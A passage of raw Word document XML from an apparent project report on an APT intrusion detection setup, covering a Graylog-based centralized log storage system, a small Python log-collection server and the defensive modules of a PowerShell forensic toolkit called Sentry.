        <w:t>Graylog Collector Sidecar then sends that information to Graylog server for centralized log information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D8127C" w:rsidRPr="00D8127C" w:rsidRDefault="00D8127C" w:rsidP="00D8127C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc484963006"/>
      <w:r>
        <w:t>DLCH Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="00AF4962" w:rsidRDefault="00BD3EE8" w:rsidP="00BD3EE8">
      <w:r>
        <w:t>The Server deployed in DLCH is code in less than a hundred lines of code using Python scripting language. This Server main purpose is to bind a default port at 56789 to listen for request from client. Then it searches for an available port, bind this port to its local system for listening and sends this port to the client. Since the DLCH is working in the LA</w:t>
      </w:r>
      <w:r w:rsidR="00AF4962">
        <w:t>Ns which host can communicate openly to each other without being NAT by any immediate router, client can easily connect to the communicate port that DLCH Server offers and sends log to DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D6443" w:rsidRPr="00D8127C" w:rsidRDefault="00AF4962" w:rsidP="00BD3EE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D6443">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00EE0D90" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc484963007"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Centralized </w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Storage</w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t xml:space="preserve"> System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="00976DC2" w:rsidRDefault="00EE0D90" w:rsidP="00EE0D90">
      <w:r>
        <w:t>To collect log data from m</w:t>
      </w:r>
      <w:r w:rsidR="008A23FC">
        <w:t>any DLCHs, we have developed a Centralized Log Storage System (CLSS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidR="00976DC2">
        <w:t>CLSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be a Graylog server installed on a machine. In each DLCH, we have installed Graylog Collector Sidecar which can collect any information written to a specified type of log files and send that data to the Graylog server. On receiving the log data from DLCHs</w:t>
      </w:r>
      <w:r w:rsidR="008A23FC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00976DC2">
        <w:t>CLSS stores the log data in its database and displays the information for administrator to monitor any anomaly behavior happened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00976DC2" w:rsidRDefault="00976DC2" w:rsidP="00976DC2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc484963008"/>
      <w:r>
        <w:t>CLSS Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRDefault="00976DC2" w:rsidP="00976DC2">
      <w:r>
        <w:t>The Architecture that describes functionalities of CLSS is graphically demonstrated in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRDefault="00EB4378" w:rsidP="00EB4378">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB5708B" wp14:editId="022B1C82">
            <wp:extent cx="5581650" cy="28968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1650" cy="2896870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRPr="00EB4378" w:rsidRDefault="00EB4378" w:rsidP="00EB4378">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc484886358"/>
      <w:r w:rsidRPr="00EB4378">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EB4378">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Centralized Log Storage System architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00EB4378" w:rsidRDefault="00EE0D90" w:rsidP="00EB4378">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="88" w:name="_Toc484963009"/>
      <w:r w:rsidR="00EB4378">
        <w:t>CLSS Workflows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00EB4378">
      <w:r>
        <w:t>DLCH is designed for storing information about anomaly activities that were monitor by APTIDS. But one DLCH can only handle some hundred monitored machines, and its limited capacity of local resource and storage cannot help it to become a full functional log storage system. For solving these issues, we make DLCH send log to CLSS. Since CLSS is implemented as an SIEM using Graylog, it is capable of handling thousand Gigabytes of data. It’s database and search engine play an essential gold helping us much in storing, querying and displaying the information. CLSS workflows for figure 3.6 can be described as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Collector Sidecar receive log information from DLCH. When DLCH writing log data into specified log files, Graylog Collector Sidecar capture this information on time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Graylog Collector Sidecar sends log data to CLSS via Graylog Rest API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00364F5C" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CLSS (or Graylog server) stores that data into its database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00364F5C" w:rsidP="00364F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graylog Search Engine implemented in Graylog, which is built into CLSS, help administrator to query and display log information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sentry: Forensic Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Powershell for penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell has changed the way how Windows is used, secured </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> the way Windows is owned. It is an automatic platform for everybody:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> developers, defenders and attackers. PowerShell provides easy access to almost everything in a Windows machine and network. It comes installed by default in modern versions of Windows. During a penetration test, it could be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>really helpful</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to use this powerful shell and scripting language for further attacks and defense</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="276FCC21" wp14:editId="06F6CF08">
            <wp:extent cx="5487166" cy="50489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48">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5487166" cy="5048955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRPr="00C62525" w:rsidRDefault="00F30840" w:rsidP="00C62525">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C62525">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sentry is executed using Powershell and Shellscript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00F30840" w:rsidP="00F30840">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r>
        <w:t>Sentry’s Modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00994B42">
      <w:r>
        <w:t>Sentry implements some modules for analyzing the compromised APT threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-EventLog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:r>
        <w:t>This module dumps some log data contained in the Windows EventLog Program for analyzing for analyzing and detecting malicious log activities. The malicious log content may be found in the Windows Security, Application and System aspect of Windows EventLog.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:r>
        <w:t>Sentry File module monitor</w:t>
      </w:r>
      <w:r w:rsidR="00D11FED">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the integrity of system file</w:t>
      </w:r>
      <w:r w:rsidR="00D11FED">
        <w:t xml:space="preserve">, identifies specific known file name or string that correlate to any specific threat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994B42">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-MemoryDump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11FED" w:rsidRPr="00D11FED" w:rsidRDefault="00D11FED" w:rsidP="00F30840">
      <w:r w:rsidRPr="00D11FED">
        <w:t>MemoryDump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module is used in case a system has been compromised and need to be analyze using Memory Forensic technique. This process help respond team to statically analyze and identify the threat based on dumped image from the system’s running memory. Furthermore, a mini memory dump could also help respond team get more information about the current running system, its connected network and some advanced information which could be used to deduct any vulnerable exposure existed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F30840" w:rsidRPr="00C45442" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45442">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11FED" w:rsidRDefault="00D11FED" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">This module helps in realtime monitoring system’s processes. Analyzing processes’ information which correlate to object could help respond team find the executable file, its hash, signature… Based on that information we can verify whether the showing signature is valid and use the file hash for </w:t>
      </w:r>
      <w:r w:rsidR="00C45442">
        <w:t>identify known threat according to malicious database system such as Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00260563" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260563">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45442" w:rsidRPr="00D11FED" w:rsidRDefault="00C45442" w:rsidP="00F30840">
      <w:r>
        <w:t>Identify any port that has a connecti</w:t>
      </w:r>
      <w:r w:rsidR="00260563">
        <w:t>on established to the Internet. Also verify for connection’s duration, its correlate executable file which establishes the connection and identify how trustful the file is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00260563" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260563">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Registry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260563" w:rsidRPr="00D11FED" w:rsidRDefault="00260563" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">This module verifies registry information using a list of registry keys. These keys are periodically checked for integrity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identifies any suspicious keys added, such as the modification happened to “startup” registers. This module also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>verify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the signature and analyze suspicious file using Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F9318A" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9318A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-SchedualedTask</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260563" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t>Analyzing ScheduledTask database to identify persistent information that execute file, which is a method used in APT via vbscript, powershell, rundll32, regsrv32 and some suspicious executable file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F9318A" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9318A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invoke-Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9318A" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">Analyzing created services via analyze their information to identify the trustworthiness about the service’s name, its state, process that run via this service, process ID, signature </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using VirusTotal for checking those suspicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9318A" w:rsidRPr="00D11FED" w:rsidRDefault="00F9318A" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">Sentry’s Trap module places trap in specific places, identify and alerting on malicious activities via logical computation. For example, placing a </w:t>
      </w:r>
      <w:r w:rsidR="009F29DA">
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which can only access using “NT Authorized / System” aut</w:t>
      </w:r>
      <w:r w:rsidR="009F29DA">
        <w:t xml:space="preserve">hority, this file is never accessed for any reason until a curious attacker, who has successfully compromised the system and escalated to System authorized account, open the file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F29DA" w:rsidRPr="00D11FED" w:rsidRDefault="009F29DA" w:rsidP="00F30840">
      <w:r>
        <w:t>This module helps in rapidly submit a suspicious file to virustotal via using HTTP query method, which implemented in available open API provided by Virustotal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRPr="009F29DA" w:rsidRDefault="00994B42" w:rsidP="00F30840">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F29DA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoke-Webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994B42" w:rsidRDefault="00DB15A5" w:rsidP="00F30840">
      <w:r>
        <w:t xml:space="preserve">Scaning webshell based on webshell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>detector  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>shelldetector.com), which identify web app files that contain malicious code via detecting known string, file name and file signature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB15A5" w:rsidRDefault="00DB15A5" w:rsidP="00F30840"/>
    <w:p w:rsidR="00994B42" w:rsidRPr="00F30840" w:rsidRDefault="00994B42" w:rsidP="00F30840"/>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00F30840">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRPr="00CA1AEF" w:rsidRDefault="00E2646F" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc484963010"/>
      <w:r w:rsidRPr="00CA1AEF">
        <w:lastRenderedPageBreak/>
        <w:t>IMPLEMENTATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:r w:rsidRPr="00CA1AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A95E8E" w:rsidRDefault="00A95E8E" w:rsidP="00E445CE">
      <w:r>
        <w:t xml:space="preserve">In the previous </w:t>
      </w:r>
      <w:r w:rsidR="00A81747">
        <w:t>chapter,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we have discussed about the architectures and workflows of APTIDS, DLCH and CLSS. In this chapter, we will get into source code dissection and analyze functions within each module. Furthermore, we will demonstrate how we test our implementation of APTIDS, DLCH and CLSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00A95E8E" w:rsidP="00A95E8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="91" w:name="_Toc484963011"/>
      <w:r>
        <w:t>APTIDS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00A95E8E" w:rsidRDefault="00A95E8E" w:rsidP="00A95E8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc484963012"/>
      <w:r>
        <w:t>Registry Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00910D7B">
        <w:t xml:space="preserve"> module’s source code</w:t>
      </w:r>
